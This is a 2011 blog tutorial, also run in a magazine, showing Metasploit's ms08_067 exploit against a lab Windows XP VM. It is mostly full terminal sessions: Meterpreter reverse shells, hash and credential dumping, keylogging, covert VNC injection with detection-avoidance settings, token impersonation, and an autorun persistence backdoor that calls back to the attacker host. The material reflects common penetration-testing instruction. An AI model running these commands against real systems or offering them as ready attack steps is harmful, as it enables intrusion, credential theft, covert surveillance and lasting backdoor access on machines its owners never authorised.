Tuesday, March 22, 2011

Metasploit - 101 with Meterpreter Payload & VNC Injection

The Metasploit framework is well known in the realm of exploit development. It is a standalone tool for security researchers, penetration testers and IDS/IPS developers. As of now, it has 640 exploit definitions and 215 payloads for injection—a huge database. This article focuses on advanced features of the Metasploit framework.


The vulnerable Windows XP SP3 system is used here as the exploit target. The SMB vulnerability used here is ms08_067_netapi (just for demonstration purposes; any vulnerability, including Web-based exploits, can be used here to gain shell access to the system). I am running XP SP3 as a virtual machine under Oracle VirtualBox 4.0.


101 with Meterpreter payload


The Meta-Interpreter payload is quite a useful payload provided by Metasploit. It can do a lot of things on the target system. It can be injected as follows.


The Windows target system IP address is 192.168.56.101, and the host OS is Ubuntu 9.10 with the IP address of 192.168.56.1. Hence, RHOST is set to 192.168.56.101 and LHOST to 192.168.56.1.The reverse_tcp type payload of Meterpreter will throw back the shell to the host system. The Meterpreter session will open after the successful exploitation.


Terminal output:
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options:
Name          Current Setting        Required        Description
-------       ------------------              -----------          --------------
RHOST                                           yes                  The target address
RPORT        445                            yes                  Set the SMB service port
SMBPIPE  BROWSER                yes                  The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):
Name          Current Setting         Required        Description
-------            ------------------              -----------        --------------
EXITFUNC thread                        yes                              Exit technique: seh, thread,process, none
LHOST                                                 yes                              The listen address
LPORT          4444                          yes                              The listen port
Exploit target:
Id  Name
--  ---- ----
0   Automatic Targeting
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(ms08_067_netapi) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(ms08_067_netapi) > show options
Module options:
Name          Current Setting         Required        Description
-------            ------------------              -----------          --------------
RHOST       192.168.56.101        yes                 The target address
RPORT       445                             yes                 Set the SMB service port
SMBPIPE  BROWSER               yes                 The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name          Current Setting         Required        Description
-------            ------------------              -----------          --------------
EXITFUNC             thread                         yes                    Exit technique: seh, thread, process, none
LHOST          192.168.56.1            yes                    The listen address
LPORT          4444                          yes                     The listen port
Exploit target:
Id  Name
--  --------
0   Automatic Targeting
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.56.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (749056 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1123) at 2011-01-04 20:25:22 +0530
meterpreter >


Important commands in the Meterpreter session


checkvm
Entering this will check whether the target is a virtual machine. This is quite useful in environments where a huge virtual infrastructure is present. Think of it as if the process in the virtual machine implementing OS virtualisation (OpenVZ) has gone bad, giving access to all virtual machines running on that physical server.


Terminal Output :
meterpreter > run checkvm
[*] Checking if target is a Virtual Machine.....
[*] This is a Sun VirtualBox Virtual Machine
meterpreter >


getcountermeasure
Entering this will get the attack countermeasures deployed at the target system. This is important because there may be a signature-detection system deployed on the target system. This also detects firewall policies and anti-virus software.


Terminal Output :
meterpreter > run getcountermeasure
[*] Running Getcountermeasure on the target...
[*] Checking for contermeasures...
[*] Getting Windows Built in Firewall configuration...
[*]
[*]         Domain profile configuration:
[*]         -------------------------------------------------------------------
[*]         Operational mode                  = Enable
[*]         Exception mode                     = Enable
[*]
[*]         Standard profile configuration (current):
[*]         -------------------------------------------------------------------
[*]         Operational mode                  = Disable
[*]         Exception mode                    = Enable
[*]
[*]         Local Area Connection firewall configuration:
[*]         -------------------------------------------------------------------
[*]         Operational mode                  = Enable
[*]
[*] Checking DEP Support Policy...
meterpreter >


get_local_subnets
Entering this will give information about the local subnets in which the target system belongs. This is useful to get information about other systems running in the same subnet.


Terminal Output :
meterpreter > run get_local_subnets
Local subnet: 192.168.56.0/255.255.255.0
meterpreter >


get_application_list
Now, this is very cool. It gives us the whole list of applications installed on the target system, with their versions. We can use this to find specific vulnerabilities in the application version, for further exploitation.


Terminal Output :
meterpreter > run get_application_list
Installed Applications
======================
Name                                                            Version
-------                                                              ----------
Adobe AIR                                                    1.5.3.9120
Adobe Flash Player 10 Plugin                              10.0.45.2
Adobe Shockwave Player 11.5                            11.5.7.609
Acrobat.com                                                 2.0.0.0
ImgBurn                                                        2.4.3.0
Mozilla Firefox (3.5.9)                                 3.5.9 (en-US)
Notepad++                                                   5.5
NetBeans IDE 6.7.1                                            6.7.1
Overlook Fing                                                    1.3
TrueCrypt                                                    6.2
Wireshark 1.0.7                                                   1.0.7
WinPcap 4.1.1                                                     4.1.0.1753
Google Toolbar for Internet Explorer        1.0.0
Microsoft .NET Framework 3.0                 3.0.04506.30
Java Auto Updater                                      2.0.2.1
Microsoft .NET Framework 2.0                 2.0.50727
Java(TM) 6 Update 20                                6.0.200
HTTP Analyzer V5.2.1                               5.2.1
Acrobat.com                                                 2.0.0
Java DB 10.4.2.1                                         10.4.2.1
meterpreter >


credcollect
This dumps all the hashes present for the administrator and users. Later on, these hashes can be used to impersonate users, or passwords can be computed by brute-forcing them.


Terminal Output :
meterpreter > run credcollect
[+] Collecting hashes...
Extracted: Administrator:560c5a660fgd552e7c3113b4a1a5e3a0:a38ad238851d3a6673a0047dc68ff8ca
Extracted: Guest:aad3b435b51404eeaad3b435b51fg4ee:31d6cfe0d16ae931b73c59d7e0c089c0
Extracted: HelpAssistant:ab57d8e30e1020c587e6449d434ca4eb:1ba62a18ffcd37a1754e13cae7afb3ed
Extracted: subodh:560c5a6604dd552e7c3113b4a1a5e3a0:a3jid238851d3a6673a0047dc68ff8ca
Extracted: SUPPORT_3io945a0s and S#:aad3b435b51404eeaad3b435b51404ee:2971f42b141f46b0bijq53cf0176eea3
[+] Collecting tokens...
HAHAHA\subodh
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
NT AUTHORITY\ANONYMOUS LOGON
meterpreter >

hashdump
Hashes for all users can also be dumped separately, to gain access, or for privilege escalation.

Terminal Output :
meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY a765f7a8d7535845f3bv7104aa69a333...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
Administrator:500:560c5a6604dd552e7c3893b4a1a5e3a0:a38ad238851d3a6673a0047dc68ff8ca:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae93jj73c59d7e0c089c0:::
HelpAssistant:1000:ab57d8e30e1020c587e6449d434ca4eb:1ba62a18ffcd37a1754e13cae7afb3ed:::
SUPPORT_388945a0:1002:aad3b435b51124eeaad3b435b51404ee:2971f42b1lof46b0b30f53cf0176eea3:::
subodh:1003:560c5a6604dd552e7c3113b4a1anm3a0:a38ad238851d3a2373a0047dc68ff8ca:::
meterpreter >

keylogrecorder
This will log all keystrokes made on the target systems to the .msf directory. The payload will live-migrate to the Explorer process displaying the PID of that process, and will start logging the keystrokes. The getpid command can be used to see which process the payload is attached to.
The keystrokes are recorded in a text file in the specified path.

Terminal output :
meterpreter > run keylogrecorder
[*] explorer.exe Process found, migrating into 1336
[*] Migration Successful!!
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /home/subodh/.msf3/logs/scripts/keylogrecorder/192.168.56.101_20110104.1024.txt
[*] Recording
[*] Saving last few keystrokes
[*] Interrupt
[*] Stopping keystroke sniffer...
meterpreter > getpid
Current pid: 1336
meterpreter >

shell
This will throw back a shell to the host OS. Now we can run whatever we want—having shell access compromises the whole system:

Terminal output :
meterpreter > shell
Process 988 created.
Channel 4 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\subodh>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 192.168.56.101
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
C:\Documents and Settings\subodh>exit
meterpreter >

Other features are also present in the Meterpreter payload, such as the downloading and uploading of files. This can be used to create automated exploit modules with Meterpreter.

Remote VNC injection
Using the Metasploit payload for VNC injection, we can also inject a VNC server remotely, and can have the display thrown back to the host system. Users of the target system user will not notice that their display is being shared, though there is a trick—we have to disable the Metasploit courtesy shell which appears on the target system's display. If the courtesy shell is not disabled, then it will show a blue command prompt window at the time of exploitation, as shown in Figure 1. This can warn the users of the target system, and result in attack detection. After disabling the courtesy shell, it will not display the blue prompt, as you can see in Figure 2. VNC injection can also be used when a user is not logged in; in that case, don't bother to disable the courtesy shell.

VNCviewer must be installed on the host system to see the VNC session thrown by the target system. I have xtightvncviewer installed on my host Ubuntu 9.10. The VNCHOST parameter is set to 127.0.0.1 by default; we have to change it to the interface on the host system IP on which the VNC session will be spawned—i.e., 192.168.56.1.

Terminal Output :
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/vncinject/reverse_tcp
payload => windows/vncinject/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options:
Name     Current Setting  Required        Description
--------    ------------------         -----------          --------------
RHOST                                           yes            The target address
RPORT       445                 yes         Set the SMB service port
SMBPIPE  BROWSER   yes             The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/vncinject/reverse_tcp):
Name           Current Setting        Required        Description
--------       ------------------        -----------          --------------
AUTOVNC         true                           yes          Automatically launch VNC viewer if present
EXITFUNC        thread                         yes          Exit technique: seh, thread, process, none
LHOST                                            yes           The listen address
LPORT        4444                         yes           The listen port
VNCHOST        127.0.0.1                    yes            The local host to use for the VNC proxy
VNCPORT         5900                          yes           The local port to use for the VNC proxy
Exploit target:
Id  Name
--  ----
0   Automatic Targeting
msf exploit(ms08_067_netapi) > set VNCHOST 192.168.56.1
VNCHOST => 192.168.56.1
msf exploit(ms08_067_netapi) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(ms08_067_netapi) > set DisableCourtesyShell TRUE
DisableCourtesyShell => TRUE
msf exploit(ms08_067_netapi) > show options
Module options:
Name     Current Setting               Required        Description
--------    ------------------                     -----------          --------------
RHOST       192.168.56.101        yes                  The target address
RPORT       445                             yes                              Set the SMB service port
SMBPIPE  BROWSER               yes                              The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/vncinject/reverse_tcp):
Name          Current Setting         Required        Description
--------           ------------------              -----------          --------------
AUTOVNC             true                 yes                              Automatically launch VNC viewer if present
EXITFUNC             thread             yes                              Exit technique: seh, thread, process, none
LHOST                    192.168.56.1 yes                              The listen address
LPORT                    4444               yes                              The listen port
VNCHOST             192.168.56.1 yes                              The local host to use for the VNC proxy
VNCPORT             5900               yes                              The local port to use for the VNC proxy
Exploit target:
Id  Name
--  ----
0   Automatic Targeting
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.56.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (445440 bytes) to 192.168.56.101
[*] VNC Server session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1145) at 2011-01-04 22:52:21 +0530
[*] Starting local TCP relay on 192.168.56.1:5900...
[*] Local TCP relay started.
[*] Launched vncviewer.
[*] Session 1 created in the background.
msf exploit(ms08_067_netapi) > Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name "hahaha"
VNC server default format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using shared memory PutImage
Same machine: preferring raw encoding
CleanupSignalHandler called
ShmCleanup called
[*] VNC connection closed.
[*] VNC Server session 1 closed.
msf exploit(ms08_067_netapi) >

Figure 1: VNCInjection with courtesy shell enabled, by default

Figure 2: VNCInjection with courtesy shell disabled

Please Click on the images for full scale resolutions.


Meterpreter incognito mode
The Incognito extension of the Meterpreter module is used to impersonate user tokens to achieve privilege escalation, and to maintain access to the system. This is used to execute jobs with the access privileges of the impersonated user. We can also get the process list by using the ps command in Meterpreter; and by using the command steal_token <pid> we can also impersonate our privileges to the level of the process initiator. This incognito mode helps us in gaining access to the part of the system that is only accessed by users or administrators with higher privileges than the compromised user.

Terminal output :
meterpreter > use incognito
Loading extension incognito...success.
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
HAHAHA\subodh
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > impersonate_token HAHAHA\\subodh
[+] Delegation token available
[+] Successfully impersonated user HAHAHA\subodh
meterpreter > getuid
Server username: HAHAHA\subodh
meterpreter > drop_token
Relinquished token, now running as: NT AUTHORITY\SYSTEM
meterpreter >

Meterpreter persistence mode
The Persistence extension is useful to keep access to the system for further exploitation; it is like planting your own back-door for access to that system later on. The Visual Basic script gets installed on the target system. This script loads auto-runs into the system, which keep on making connections to the host IP that was configured at the time of the first exploitation. After that, every time the user logs in, the script throws a shell back to the configured remote IP.

Terminal Output :
meterpreter > run persistence -U -i 5 -p 443 -r 192.168.56.1
[*] Running Persistance Script
[*] Resource file for cleanup created at /home/subodh/.msf3/logs/scripts/persistence/HAHAHA_20110104.4415/HAHAHA_20110104.4415.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=443
[*] Persistent agent script is 612577 bytes long
[+] Persisten Script written to C:\WINDOWS\TEMP\qabWKT.vbs
[*] Executing script C:\WINDOWS\TEMP\qabWKT.vbs
[+] Agent executed with PID 1200
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\jwaGgfooIEPNZ
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\jwaGgfooIEPNZ
meterpreter >

Persistence parameters

run persistence -U -i 5 -p 443 -r 192.168.56.1
-U = automatically starts a module when the user logs in.
-i = interval between each connection to the remote IP address configured.
-p = port to reach on the remote IP address for Metasploit connection, i.e. the persistence process on the target system will try to connect to 192.168.56.1 on port 443 every 5 seconds.
-r = reachable remote IP address to have handler shell.

Moving on, we just need to load the simpler generic handler exploit module, reverse_tcp payload and wait for the Meterpreter shell to appear. This stub exploit provides an interface for handling the exploit connection. At the time of deploying the exploit script, remember to note the clean-up link. This exploit could be dangerous, as it leaves traces on the target system. Be sure to clean it up after exploitation. The script location and registry entries can be cleared when the access to the target system is no longer required.

Terminal Output :
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > show options
Module options:
Name                     Current Setting         Required        Description
--------              ------------------        -----------          --------------
Payload options (windows/meterpreter/reverse_tcp):
Name                      Current Setting         Required        Description
--------                ------------------        -----------          --------------
EXITFUNC             process                             yes       Exit technique: seh, thread, process, none
LHOST                    192.168.56.1             yes       The listen address
LPORT                    443                             yes       The listen port
Exploit target:
Id  Name
--  ----
0   Wildcard Target
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.56.1:443
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to 192.168.56.101
[*] Meterpreter session 3 opened (192.168.56.1:443 -> 192.168.56.101:1049) at 2011-01-05 00:04:58 +0530
meterpreter >

That's all for now, but this is just a start to the endless possibilities for exploitation. I will be back soon with more exciting stuff for you guys.

References
http://www.offensive-security.com/metasploit-unleashed/

Note : - This Article is posted by me in the Linux for you Magazine for February 2011 issue. Linux for you is the leading Open-source & Linux magazine in the Asia Region.

No comments:

Post a Comment